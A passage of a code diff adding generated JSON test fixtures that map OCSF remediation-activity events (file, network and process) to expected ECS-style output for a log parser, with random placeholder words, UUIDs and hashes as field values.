\"a9de1552-a029-11ef-9be5-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"a9de21c8-a029-11ef-a4ce-0242ac110007\", \"uid_alt\": \"camel license fl\"}, \"type\": \"Regular File\", \"path\": \"violin economic czech/regular.accdb/brazilian.tar.gz\", \"product\": {\"name\": \"just philippines startup\", \"version\": \"1.3.0\", \"uid\": \"a9de4ec8-a029-11ef-96ee-0242ac110007\", \"feature\": {\"name\": \"metro municipality egypt\", \"version\": \"1.3.0\", \"uid\": \"a9de59f4-a029-11ef-8d34-0242ac110007\"}, \"cpe_name\": \"highly os treated\", \"vendor_name\": \"candidates etc beverage\"}, \"ext\": \"labels oriental websites\", \"type_id\": 1, \"creator\": {\"name\": \"Templates\", \"uid\": \"a9deb516-a029-11ef-8430-0242ac110007\", \"org\": {\"name\": \"welfare philip fathers\", \"uid\": \"a9dec100-a029-11ef-986c-0242ac110007\", \"ou_name\": \"threat supporting pension\"}, \"email_addr\": \"Tabetha@programmers.arpa\"}, \"mime_type\": \"agree/diego\", \"parent_folder\": \"violin economic czech/regular.accdb\", \"hashes\": [{\"value\": \"23BF00BD8ADB4469651EB5D5C47027D49C53BB2D\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"4F80D2DFFF57658A1076FF2F74282A97BB0B6574\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"conventional indexes merit\", \"version\": \"1.3.0\", \"uid\": \"a9dc7224-a029-11ef-ae98-0242ac110007\"}, \"product\": {\"name\": \"zimbabwe meals purchase\", \"version\": \"1.3.0\", \"uid\": \"a9dcfdac-a029-11ef-aa8a-0242ac110007\", \"vendor_name\": \"status hole consider\"}, \"profiles\": [], \"log_name\": \"attorney destinations evolution\", \"log_provider\": \"sections sides trembl\", \"modified_time\": 1731328627575, \"original_time\": \"coalition polyphonic limit\", \"tenant_uid\": \"a9ddd8d0-a029-11ef-a422-0242ac110007\"}, \"scan\": {\"name\": \"nd lawn seeking\", \"type\": \"Updated Content\", \"uid\": \"a9ddf644-a029-11ef-b1ea-0242ac110007\", \"type_id\": 3}, \"severity\": \"Unknown\", \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"activity_name\": \"Evict\", \"command_uid\": \"a9deee3c-a029-11ef-8d19-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a9ded82a-a029-11ef-9aed-0242ac110007\"}, \"d3f_technique\": {\"name\": \"collecting monte craps\", \"uid\": \"a9dee1da-a029-11ef-b734-0242ac110007\"}}], \"severity_id\": 0, \"status_code\": \"holes\", \"status_detail\": \"payroll perfectly prospective\", \"status_id\": 6}" + }, + "expected": { + "message": "{\"message\": \"baker testimonials approx\", \"status\": \"Error\", \"time\": 1731328627583, \"file\": {\"attributes\": 65, \"name\": \"brazilian.tar.gz\", \"owner\": {\"name\": \"Enrolled\", \"type\": \"Unknown\", \"uid\": \"a9de1552-a029-11ef-9be5-0242ac110007\", \"type_id\": 0, \"credential_uid\": \"a9de21c8-a029-11ef-a4ce-0242ac110007\", \"uid_alt\": \"camel license fl\"}, \"type\": \"Regular File\", \"path\": \"violin economic czech/regular.accdb/brazilian.tar.gz\", \"product\": {\"name\": \"just philippines startup\", \"version\": \"1.3.0\", \"uid\": \"a9de4ec8-a029-11ef-96ee-0242ac110007\", \"feature\": {\"name\": \"metro municipality egypt\", \"version\": \"1.3.0\", \"uid\": \"a9de59f4-a029-11ef-8d34-0242ac110007\"}, \"cpe_name\": \"highly os treated\", \"vendor_name\": \"candidates etc beverage\"}, \"ext\": \"labels oriental websites\", \"type_id\": 1, \"creator\": {\"name\": \"Templates\", \"uid\": \"a9deb516-a029-11ef-8430-0242ac110007\", \"org\": {\"name\": \"welfare philip fathers\", \"uid\": \"a9dec100-a029-11ef-986c-0242ac110007\", \"ou_name\": \"threat supporting pension\"}, \"email_addr\": \"Tabetha@programmers.arpa\"}, \"mime_type\": \"agree/diego\", \"parent_folder\": \"violin economic czech/regular.accdb\", \"hashes\": [{\"value\": \"23BF00BD8ADB4469651EB5D5C47027D49C53BB2D\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}, {\"value\": \"4F80D2DFFF57658A1076FF2F74282A97BB0B6574\", \"algorithm\": \"SHA-1\", \"algorithm_id\": 2}], \"xattributes\": {}}, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"conventional indexes merit\", \"version\": \"1.3.0\", \"uid\": \"a9dc7224-a029-11ef-ae98-0242ac110007\"}, \"product\": {\"name\": \"zimbabwe meals purchase\", \"version\": \"1.3.0\", \"uid\": \"a9dcfdac-a029-11ef-aa8a-0242ac110007\", \"vendor_name\": \"status hole consider\"}, \"profiles\": [], \"log_name\": \"attorney destinations evolution\", \"log_provider\": \"sections sides trembl\", \"modified_time\": 1731328627575, \"original_time\": \"coalition polyphonic limit\", \"tenant_uid\": \"a9ddd8d0-a029-11ef-a422-0242ac110007\"}, \"scan\": {\"name\": \"nd lawn seeking\", \"type\": \"Updated Content\", \"uid\": \"a9ddf644-a029-11ef-b1ea-0242ac110007\", \"type_id\": 3}, \"severity\": \"Unknown\", \"category_uid\": 7, \"activity_id\": 2, \"type_uid\": 700202, \"type_name\": \"File Remediation Activity: Evict\", \"category_name\": \"Remediation\", \"class_uid\": 7002, \"class_name\": \"File Remediation Activity\", \"activity_name\": \"Evict\", \"command_uid\": \"a9deee3c-a029-11ef-8d19-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a9ded82a-a029-11ef-9aed-0242ac110007\"}, \"d3f_technique\": {\"name\": \"collecting monte craps\", \"uid\": \"a9dee1da-a029-11ef-b734-0242ac110007\"}}], \"severity_id\": 0, \"status_code\": \"holes\", \"status_detail\": \"payroll perfectly prospective\", \"status_id\": 6}", + "event": { + "action": "evict", + "category": [], + "provider": "sections sides trembl", + "reason": "baker testimonials approx", + "severity": 0, + "type": [] + }, + "@timestamp": "2024-11-11T12:37:07.583000Z", + "file": { + "directory": "violin economic czech/regular.accdb", + "hash": { + "sha1": "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D4F80D2DFFF57658A1076FF2F74282A97BB0B6574" + }, + "mime_type": "agree/diego", + "name": "brazilian.tar.gz", + "owner": "Enrolled", + "path": "violin economic czech/regular.accdb/brazilian.tar.gz", + "type": "Regular File", + "uid": "a9de1552-a029-11ef-9be5-0242ac110007" + }, + "ocsf": { + "activity_id": 2, + "activity_name": "Evict", + "class_name": "File Remediation Activity", + "class_uid": 7002 + }, + "related": { + "hash": [ + "23BF00BD8ADB4469651EB5D5C47027D49C53BB2D4F80D2DFFF57658A1076FF2F74282A97BB0B6574" + ], + "user": [ + "Enrolled" + ] + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_network_remediation_activity_1.json b/OCSF/ocsf/tests/generated_network_remediation_activity_1.json new file mode 100644 index 000000000..4209eb1be --- /dev/null +++ b/OCSF/ocsf/tests/generated_network_remediation_activity_1.json @@ -0,0 +1,29 @@ +{ + "input": { + "message": "{\"message\": \"kills routine cookie\", \"status\": \"Error\", \"time\": 1731331184401, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"consoles paste democrats\", \"version\": \"1.3.0\", \"uid\": \"9dd714a6-a02f-11ef-a375-0242ac110007\"}, \"product\": {\"name\": \"strip milton message\", \"uid\": \"9dd78440-a02f-11ef-9b45-0242ac110007\", \"feature\": {\"name\": \"dealing instruction glasgow\", \"version\": \"1.3.0\", \"uid\": \"9dd7bc30-a02f-11ef-a841-0242ac110007\"}, \"vendor_name\": \"praise profit voyeurweb\"}, \"uid\": \"9dd80514-a02f-11ef-ad38-0242ac110007\", \"profiles\": [], \"log_name\": \"mens coverage sustained\", \"log_provider\": \"expertise browse courier\", \"logged_time\": 1731331184386, \"original_time\": \"sauce female resulted\", \"tenant_uid\": \"9dd8901a-a02f-11ef-b542-0242ac110007\"}, \"connection_info\": {\"uid\": \"9dd8e524-a02f-11ef-a212-0242ac110007\", \"boundary\": \"Unknown\", \"protocol_name\": \"notion expressed postcards\", \"direction\": \"Outbound\", \"boundary_id\": 0, \"direction_id\": 2, \"protocol_num\": 62, \"protocol_ver\": \"pricing\", \"protocol_ver_id\": 99, \"tcp_flags\": 39}, \"severity\": \"High\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"pricing pope defendant\", \"type\": \"Process Name\", \"type_id\": 9}, {\"name\": \"fail long monthly\", \"type\": \"Resource UID\", \"type_id\": 10, \"reputation\": {\"base_score\": 5.3863, \"provider\": \"finally responding daughter\", \"score\": \"Probably Safe\", \"score_id\": 3}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 79, \"activity_name\": \"Restore\", \"command_uid\": \"9ddaa616-a02f-11ef-bdaf-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"9dd9bdc8-a02f-11ef-a7a3-0242ac110007\"}, \"d3f_technique\": {\"name\": \"informal statistics lcd\", \"uid\": \"9dda024c-a02f-11ef-938d-0242ac110007\"}}], \"severity_id\": 4, \"status_code\": \"cds\", \"status_id\": 6}" + }, + "expected": { + "message": "{\"message\": \"kills routine cookie\", \"status\": \"Error\", \"time\": 1731331184401, \"metadata\": {\"version\": \"1.3.0\", \"extension\": {\"name\": \"consoles paste democrats\", \"version\": \"1.3.0\", \"uid\": \"9dd714a6-a02f-11ef-a375-0242ac110007\"}, \"product\": {\"name\": \"strip milton message\", \"uid\": \"9dd78440-a02f-11ef-9b45-0242ac110007\", \"feature\": {\"name\": \"dealing instruction glasgow\", \"version\": \"1.3.0\", \"uid\": \"9dd7bc30-a02f-11ef-a841-0242ac110007\"}, \"vendor_name\": \"praise profit voyeurweb\"}, \"uid\": \"9dd80514-a02f-11ef-ad38-0242ac110007\", \"profiles\": [], \"log_name\": \"mens coverage sustained\", \"log_provider\": \"expertise browse courier\", \"logged_time\": 1731331184386, \"original_time\": \"sauce female resulted\", \"tenant_uid\": \"9dd8901a-a02f-11ef-b542-0242ac110007\"}, \"connection_info\": {\"uid\": \"9dd8e524-a02f-11ef-a212-0242ac110007\", \"boundary\": \"Unknown\", \"protocol_name\": \"notion expressed postcards\", \"direction\": \"Outbound\", \"boundary_id\": 0, \"direction_id\": 2, \"protocol_num\": 62, \"protocol_ver\": \"pricing\", \"protocol_ver_id\": 99, \"tcp_flags\": 39}, \"severity\": \"High\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"pricing pope defendant\", \"type\": \"Process Name\", \"type_id\": 9}, {\"name\": \"fail long monthly\", \"type\": \"Resource UID\", \"type_id\": 10, \"reputation\": {\"base_score\": 5.3863, \"provider\": \"finally responding daughter\", \"score\": \"Probably Safe\", \"score_id\": 3}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 79, \"activity_name\": \"Restore\", \"command_uid\": \"9ddaa616-a02f-11ef-bdaf-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"9dd9bdc8-a02f-11ef-a7a3-0242ac110007\"}, \"d3f_technique\": {\"name\": \"informal statistics lcd\", \"uid\": \"9dda024c-a02f-11ef-938d-0242ac110007\"}}], \"severity_id\": 4, \"status_code\": \"cds\", \"status_id\": 6}", + "event": { + "action": "restore", + "category": [], + "provider": "expertise browse courier", + "reason": "kills routine cookie", + "severity": 4, + "type": [] + }, + "@timestamp": "2024-11-11T13:19:44.401000Z", + "network": { + "direction": [ + "unknown" + ], + "iana_number": "62" + }, + "ocsf": { + "activity_id": 3, + "activity_name": "Restore", + "class_name": "Network Remediation Activity", + "class_uid": 7004 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_network_remediation_activity_2.json b/OCSF/ocsf/tests/generated_network_remediation_activity_2.json new file mode 100644 index 000000000..afc4afcbe --- /dev/null +++ b/OCSF/ocsf/tests/generated_network_remediation_activity_2.json @@ -0,0 +1,30 @@ +{ + "input": { + "message": "{\"count\": 70, \"message\": \"virtue carb keeps\", \"status\": \"Unknown\", \"time\": 1731331194181, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"subjective myself systems\", \"version\": \"1.3.0\", \"uid\": \"a3ac922a-a02f-11ef-984c-0242ac110007\", \"feature\": {\"name\": \"seafood zen attacks\", \"version\": \"1.3.0\", \"uid\": \"a3ad2ca8-a02f-11ef-a741-0242ac110007\"}, \"vendor_name\": \"sullivan participation wired\"}, \"extensions\": [{\"name\": \"faq valuable theory\", \"version\": \"1.3.0\", \"uid\": \"a3ad55ac-a02f-11ef-9d32-0242ac110007\"}, {\"name\": \"diesel salmon graduates\", \"version\": \"1.3.0\", \"uid\": \"a3ad70e6-a02f-11ef-be20-0242ac110007\"}], \"profiles\": [], \"log_name\": \"influence increasing towers\", \"log_provider\": \"defence ignore carroll\", \"original_time\": \"baths ends led\", \"tenant_uid\": \"a3ad8d56-a02f-11ef-a66b-0242ac110007\"}, \"scan\": {\"name\": \"fits educated vip\", \"type\": \"Attached Media\", \"uid\": \"a3ae1122-a02f-11ef-b0ef-0242ac110007\", \"type_id\": 5}, \"connection_info\": {\"uid\": \"a3ae3c42-a02f-11ef-bdd6-0242ac110007\", \"boundary\": \"Internet Gateway\", \"protocol_name\": \"nuts oriented data\", \"direction\": \"Inbound\", \"boundary_id\": 11, \"direction_id\": 1, \"protocol_num\": 88, \"protocol_ver\": \"Unknown\", \"protocol_ver_id\": 0}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"catherine lawsuit wash\", \"type\": \"File Name\", \"value\": \"underwear img tp\", \"type_id\": 7}, {\"name\": \"drawn vol buy\", \"type\": \"Email Address\", \"type_id\": 5, \"reputation\": {\"base_score\": 40.1815, \"provider\": \"miscellaneous applying places\", \"score\": \"tapes\", \"score_id\": 99}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 96, \"activity_name\": \"Restore\", \"command_uid\": \"a3aecf68-a02f-11ef-b5f1-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a3ae8698-a02f-11ef-a4fc-0242ac110007\", \"src_url\": \"weak\"}, \"d3f_technique\": {\"name\": \"gratuit refused endorsed\", \"uid\": \"a3ae95ac-a02f-11ef-b756-0242ac110007\"}}], \"enrichments\": [{\"data\": \"year\", \"name\": \"terry acceptance unavailable\", \"type\": \"me mo fetish\", \"value\": \"ride restore bearing\", \"created_time\": 1731331194181, \"provider\": \"illinois ferrari samuel\", \"reputation\": {\"base_score\": 43.1915, \"provider\": \"view rankings um\", \"score\": \"Very Safe\", \"score_id\": 1}, \"short_desc\": \"uganda pose worse\", \"src_url\": \"aluminium\"}, {\"data\": \"funky\", \"name\": \"italic electrical successfully\", \"type\": \"ethnic hitachi stevens\", \"value\": \"steven m rogers\", \"desc\": \"digital jeffrey rogers\", \"created_time\": 1731331194181, \"short_desc\": \"cook psi jobs\", \"src_url\": \"hp\"}], \"severity_id\": 3, \"status_code\": \"professionals\", \"status_detail\": \"affiliated carries publications\", \"status_id\": 0}" + }, + "expected": { + "message": "{\"count\": 70, \"message\": \"virtue carb keeps\", \"status\": \"Unknown\", \"time\": 1731331194181, \"metadata\": {\"version\": \"1.3.0\", \"product\": {\"name\": \"subjective myself systems\", \"version\": \"1.3.0\", \"uid\": \"a3ac922a-a02f-11ef-984c-0242ac110007\", \"feature\": {\"name\": \"seafood zen attacks\", \"version\": \"1.3.0\", \"uid\": \"a3ad2ca8-a02f-11ef-a741-0242ac110007\"}, \"vendor_name\": \"sullivan participation wired\"}, \"extensions\": [{\"name\": \"faq valuable theory\", \"version\": \"1.3.0\", \"uid\": \"a3ad55ac-a02f-11ef-9d32-0242ac110007\"}, {\"name\": \"diesel salmon graduates\", \"version\": \"1.3.0\", \"uid\": \"a3ad70e6-a02f-11ef-be20-0242ac110007\"}], \"profiles\": [], \"log_name\": \"influence increasing towers\", \"log_provider\": \"defence ignore carroll\", \"original_time\": \"baths ends led\", \"tenant_uid\": \"a3ad8d56-a02f-11ef-a66b-0242ac110007\"}, \"scan\": {\"name\": \"fits educated vip\", \"type\": \"Attached Media\", \"uid\": \"a3ae1122-a02f-11ef-b0ef-0242ac110007\", \"type_id\": 5}, \"connection_info\": {\"uid\": \"a3ae3c42-a02f-11ef-bdd6-0242ac110007\", \"boundary\": \"Internet Gateway\", \"protocol_name\": \"nuts oriented data\", \"direction\": \"Inbound\", \"boundary_id\": 11, \"direction_id\": 1, \"protocol_num\": 88, \"protocol_ver\": \"Unknown\", \"protocol_ver_id\": 0}, \"severity\": \"Medium\", \"category_uid\": 7, \"activity_id\": 3, \"type_uid\": 700403, \"type_name\": \"Network Remediation Activity: Restore\", \"observables\": [{\"name\": \"catherine lawsuit wash\", \"type\": \"File Name\", \"value\": \"underwear img tp\", \"type_id\": 7}, {\"name\": \"drawn vol buy\", \"type\": \"Email Address\", \"type_id\": 5, \"reputation\": {\"base_score\": 40.1815, \"provider\": \"miscellaneous applying places\", \"score\": \"tapes\", \"score_id\": 99}}], \"category_name\": \"Remediation\", \"class_uid\": 7004, \"class_name\": \"Network Remediation Activity\", \"timezone_offset\": 96, \"activity_name\": \"Restore\", \"command_uid\": \"a3aecf68-a02f-11ef-b5f1-0242ac110007\", \"countermeasures\": [{\"version\": \"1.3.0\", \"d3f_tactic\": {\"uid\": \"a3ae8698-a02f-11ef-a4fc-0242ac110007\", \"src_url\": \"weak\"}, \"d3f_technique\": {\"name\": \"gratuit refused endorsed\", \"uid\": \"a3ae95ac-a02f-11ef-b756-0242ac110007\"}}], \"enrichments\": [{\"data\": \"year\", \"name\": \"terry acceptance unavailable\", \"type\": \"me mo fetish\", \"value\": \"ride restore bearing\", \"created_time\": 1731331194181, \"provider\": \"illinois ferrari samuel\", \"reputation\": {\"base_score\": 43.1915, \"provider\": \"view rankings um\", \"score\": \"Very Safe\", \"score_id\": 1}, \"short_desc\": \"uganda pose worse\", \"src_url\": \"aluminium\"}, {\"data\": \"funky\", \"name\": \"italic electrical successfully\", \"type\": \"ethnic hitachi stevens\", \"value\": \"steven m rogers\", \"desc\": \"digital jeffrey rogers\", \"created_time\": 1731331194181, \"short_desc\": \"cook psi jobs\", \"src_url\": \"hp\"}], \"severity_id\": 3, \"status_code\": \"professionals\", \"status_detail\": \"affiliated carries publications\", \"status_id\": 0}", + "event": { + "action": "restore", + "category": [], + "outcome": "unknown", + "provider": "defence ignore carroll", + "reason": "virtue carb keeps", + "severity": 3, + "type": [] + }, + "@timestamp": "2024-11-11T13:19:54.181000Z", + "network": { + "direction": [ + "inbound" + ], + "iana_number": "88" + }, + "ocsf": { + "activity_id": 3, + "activity_name": "Restore", + "class_name": "Network Remediation Activity", + "class_uid": 7004 + } + } +} \ No newline at end of file diff --git a/OCSF/ocsf/tests/generated_process_remediation_activity_1.json b/OCSF/ocsf/tests/generated_process_remediation_activity_1.json new file mode 100644 index 000000000..ac2f48c8a --- /dev/null +++ b/OCSF/ocsf/tests/generated_process_remediation_activity_1.json @@ -0,0 +1,78 @@ +{ + "input": { + "message": "{\"message\": \"heaven country sugar\", \"process\": {\"name\": \"Success\", \"pid\": 94, \"file\": {\"name\": \"earliest.pdb\", \"owner\": {\"name\": \"Tee\", \"type\": \"Unknown\", \"domain\": \"term assembled gossip\", \"uid\": \"223ad95e-a02f-11ef-8523-0242ac110007\", \"type_id\": 0, \"full_name\": \"Kaycee Valarie\", \"risk_level\": \"orleans medicines legal\"}, \"type\": \"Regular File\", \"path\": \"guilty different comply/expects.accdb/earliest.pdb\", \"desc\": \"prominent purse jones\", \"ext\": \"rendered ministry investigators\", \"type_id\": 1, \"parent_folder\": \"guilty different comply/expects.accdb\", \"hashes\": [{\"value\": \"EFE899C74558F20B08BBC19BF0228C0C25BDDB7871D80BD34AC8B33C030B3698\", \"algorithm\": \"SHA-256\", \"algorithm_id\": 3}, {\"value\": \"6B1C747BA410921F62727C6AEE307A71A7021A4F23DCD2CCFAB1EC037E3A86C28518C84FC4E389893A41ED6CC8EFCA276E1FA37D836A1183305EC8DD7BC3D3F0\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}]}, \"user\": {\"name\": \"Livestock\", \"type\": \"Admin\", \"uid\": \"223aed7c-a02f-11ef-943c-0242ac110007\", \"type_id\": 2, \"risk_level\": \"sense\", \"risk_level_id\": 99}, \"loaded_modules\": [\"/offered/her/msg/vegetarian/bizarre.html\", \"/principle/setting/liz/defendant/herself.wsf\"], \"cmd_line\": \"guided stretch phrases\", \"created_time\": 1731330976996, \"parent_process\": {\"name\": \"Em\", \"pid\": 60, \"file\": {\"name\": \"texas.rss\", \"type\": \"Regular File\", \"path\": \"pipeline memorabilia wednesday/lindsay.thm/texas.rss\", \"product\": {\"name\": \"rather rate cms\", \"version\": \"1.3.0\", \"uid\": \"223b1036-a02f-11ef-a666-0242ac110007\", \"lang\": \"en\", \"vendor_name\": \"assistance printers careful\"}, \"uid\": \"223b1766-a02f-11ef-b077-0242ac110007\", \"ext\": \"around clear funk\", \"type_id\": 1, \"parent_folder\": \"pipeline memorabilia wednesday/lindsay.thm\", \"accessed_time\": 1731330976998, \"hashes\": [{\"value\": \"0C9582BD64D9BAB6B4D907C275F45B5D3FC0035986E6294724E7FC4C77A9E16F42AD975BA9F5AD3884CCEFB2635640629F2AA538C5FDA52E2D872D3B73F65C6C\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}, {\"value\": \"31FEBEB59C135F276A56FF06D2A3B00B982685E2D8EF3205B97EB80E0F4DCDC3\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": true, \"xattributes\": {}}, \"user\": {\"name\": \"Membership\", \"type\": \"System\", \"uid\": \"223b30c0-a02f-11ef-87cb-0242ac110007\", \"type_id\": 3, \"full_name\": \"Anita Rosanna\", \"email_addr\": \"Li@scientific.travel\"}, \"uid\": \"223b4aa6-a02f-11ef-9d39-0242ac110007\", \"cmd_line\": \"suits chris sega\", \"created_time\": 1731330976999, \"lineage\": [\"alternative consistently improved\", \"cats charm hardcover\"], \"parent_process\": {\"name\": \"Humor\", \"pid\": 26, \"file\": {\"name\": \"incorrect.gadget\", \"type\": \"Regular File\", \"version\": \"1.3.0\", \"path\": \"upset india relax/marie.3gp/incorrect.gadget\", \"product\": {\"name\": \"grades internationally ordinary\", \"version\": \"1.3.0\", \"uid\": \"223b9d6c-a02f-11ef-af12-0242ac110007\", \"feature\": {\"name\": \"motivation bridges other\", \"version\": \"1.3.0\", \"uid\": \"223bade8-a02f-11ef-a579-0242ac110007\"}, \"vendor_name\": \"lightweight monday station\"}, \"uid\": \"223bb4f0-a02f-11ef-9470-0242ac110007\", \"ext\": \"celebrities intelligent david\", \"type_id\": 1, \"accessor\": {\"name\": \"Institutes\", \"type\": \"User\", \"uid\": \"223bc1b6-a02f-11ef-be06-0242ac110007\", \"org\": {\"uid\": \"223bcfee-a02f-11ef-9eaf-0242ac110007\", \"ou_name\": \"sixth rats hawk\"}, \"type_id\": 1, \"account\": {\"name\": \"fairy clause literally\", \"uid\": \"223be3a8-a02f-11ef-b63a-0242ac110007\"}, \"credential_uid\": \"223befc4-a02f-11ef-9ee4-0242ac110007\", \"ldap_person\": {\"email_addrs\": [\"Suzann@verbal.biz\", \"Flo@submissions.int\"], \"last_login_time\": 1731330977003, \"leave_time\": 1731330977003}, \"risk_level\": \"Critical\", \"risk_level_id\": 4, \"risk_score\": 44}, \"parent_folder\": \"upset india relax/marie.3gp\", \"hashes\": [{\"value\": \"4B300F704B4BD8E100BDB3CAB1031A6CEDCB68FBC2C3606B1178586034AF4ECAC9A514E1A67728708F5FAD5AD1FC04AE78ECA412443352AF94457FEC9581ED11\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"C861DBBC3D16CC0E2D8C34764F0864239EBAC9973B25229B5ADFE56574C851ED73B6FCBC5931C8F0E23094B0D787E183BF5DF893560460CD403ED6F6C7174B7D\", \"algorithm\": \"quickXorHash\", \"algorithm_id\": 7}]}, \"user\": {\"name\": \"Protection\", \"type\": \"Unknown\", \"uid\": \"223c0d88-a02f-11ef-bfe0-0242ac110007\", \"type_id\": 0, \"full_name\": \"Brittanie Russel\", \"credential_uid\": \"223c156c-a02f-11ef-ae21-0242ac110007\", \"risk_level\": \"school wall wolf\", \"risk_score\": 37}, \"cmd_line\": \"roof dt critical\", \"created_time\": 1731330977004, \"parent_process\": {\"name\": \"Iv\", \"file\": {\"name\": \"retro.bmp\", \"type\": \"Named Pipe\", \"path\": \"rubber mj queen/archive.wav/retro.bmp\", \"signature\": {\"state\": \"lauderdale illustrated editorial\", \"certificate\": {\"version\": \"1.3.0\", \"subject\": \"mighty assisted detail\", \"issuer\": \"accompanied routers acne\", \"fingerprints\": [{\"value\": \"022DEC95C5096AFDD20A88DF019AC56B\", \"algorithm\": \"MD5\", \"algorithm_id\": 1}, {\"value\": \"8418E7362D4E0848D22B88FF2EC86F93AB49AE75A1558CE41B75732C6B78955A\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"created_time\": 1731330977005, \"expiration_time\": 1731330977005, \"serial_number\": \"receivers stylish woods\"}, \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, \"desc\": \"rep jeff tape\", \"ext\": \"through testimonials cardiff\", \"type_id\": 6, \"parent_folder\": \"rubber mj queen/archive.wav\", \"accessed_time\": 1731330977005, \"hashes\": [{\"value\": \"311EF3B8DC9FFBC403CA8BFEFAF69F728D2BE1AFFB42206E860CAA9F9FC9D8A57266E69AF264348CFACF811255655CDAF7BF4204EA0E7C0AD91297FCCB92BD28\", \"algorithm\": \"TLSH\", \"algorithm_id\": 6}, {\"value\": \"12B400C07544526379365632C5EAE7B868347EA513F21C09D8F5A9306B373005\", \"algorithm\": \"magic\", \"algorithm_id\": 99}]}, \"user\": {\"name\": \"Rise\", \"type\": \"omissions\", \"uid\": \"223c3c36-a02f-11ef-a7a3-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"naturally textile pharmacies\", \"uid\": \"223c4b7c-a02f-11ef-90fb-0242ac110007\"}}, \"uid\": \"223c51e4-a02f-11ef-8de3-0242ac110007\", \"cmd_line\": \"keyboard milk printers\", \"created_time\": 1731330977006, \"parent_process\": {\"name\": \"Computation\", \"pid\": 30, \"file\": {\"name\": \"posted.yuv\", \"type\": \"Folder\", \"path\": \"kid hollow housing/trick.dwg/posted.yuv\", \"ext\": \"gage capabilities reasons\", \"type_id\": 2, \"accessor\": {\"type\": \"User\", \"uid\": \"223c6ed6-a02f-11ef-9e28-0242ac110007\", \"org\": {\"name\": \"salem civil rely\", \"uid\": \"223c784a-a02f-11ef-b6f3-0242ac110007\", \"ou_name\": \"saudi kathy going\"}, \"type_id\": 1, \"credential_uid\": \"223c7f2a-a02f-11ef-9b2e-0242ac110007\"}, \"parent_folder\": \"kid hollow housing/trick.dwg\", \"accessed_time\": 1731330977007, \"hashes\": [{\"value\": \"84282F14696FCE92F1387E783E6E35A7F462B8F63DD2CBBF03C8FBD817B4B334EA21DB328F7F7CC7040EBAEC27B5E741457DFC36FAEC09CB527ECE2B22C142C4\", \"algorithm\": \"Unknown\", \"algorithm_id\": 0}, {\"value\": \"A74A78AF4E994F8C5ADE1098C677DEE43370A2B898524B0730EBFF42FA2C8359\", \"algorithm\": \"magic\", \"algorithm_id\": 99}], \"is_system\": false}, \"user\": {\"name\": \"Royal\", \"type\": \"eclipse\", \"uid\": \"223c92ee-a02f-11ef-b37d-0242ac110007\", \"org\": {\"name\": \"races obtaining business\", \"uid\": \"223c9f6e-a02f-11ef-80ed-0242ac110007\", \"ou_name\": \"larger phones hotel\", \"ou_uid\": \"223ca72a-a02f-11ef-b597-0242ac110007\"}, \"type_id\": 99, \"account\": {\"name\": \"execution implemented contributions\", \"type\": \"AWS Account\", \"uid\": \"223cb300-a02f-11ef-a109-0242ac110007\", \"type_id\": 10}, \"ldap_person\": {\"location\": {\"desc\": \"Senegal, Republic of\", \"city\": \"Barely vpn\", \"country\": \"SN\", \"coordinates\": [-6.1769, -23.2664], \"continent\": \"Africa\"}, \"given_name\": \"oven registrar consultant\", \"ldap_cn\": \"insulin convicted posted\", \"modified_time\": 1731330977010}}, \"tid\": 28, \"uid\": \"223d09cc-a02f-11ef-88a8-0242ac110007\", \"cmd_line\": \"cologne preventing pvc\", \"created_time\": 1731330977010, \"integrity\": \"tears\", \"integrity_id\": 99, \"parent_process\": {\"pid\": 58, \"file\": {\"name\": \"concept.tar\", \"type\": \"Regular File\", \"path\": \"aging socks soc/traditions.nes/concept.tar\", \"modifier\": {\"name\": \"Mai\", \"type\": \"mineral\", \"uid\": \"223d2b96-a02f-11ef-a466-0242ac110007\", \"type_id\": 99, \"account\": {\"name\": \"fitting remembered advertiser\", \"type\": \"Linux Account\", \"uid\": \"223d378a-a02f-11ef-a93b-0242ac110007\", \"type_id\": 9}, \"credential_uid\": \"223d4086-a02f-11ef-aae8-0242ac110007\", \"risk_level\": \"Low\", 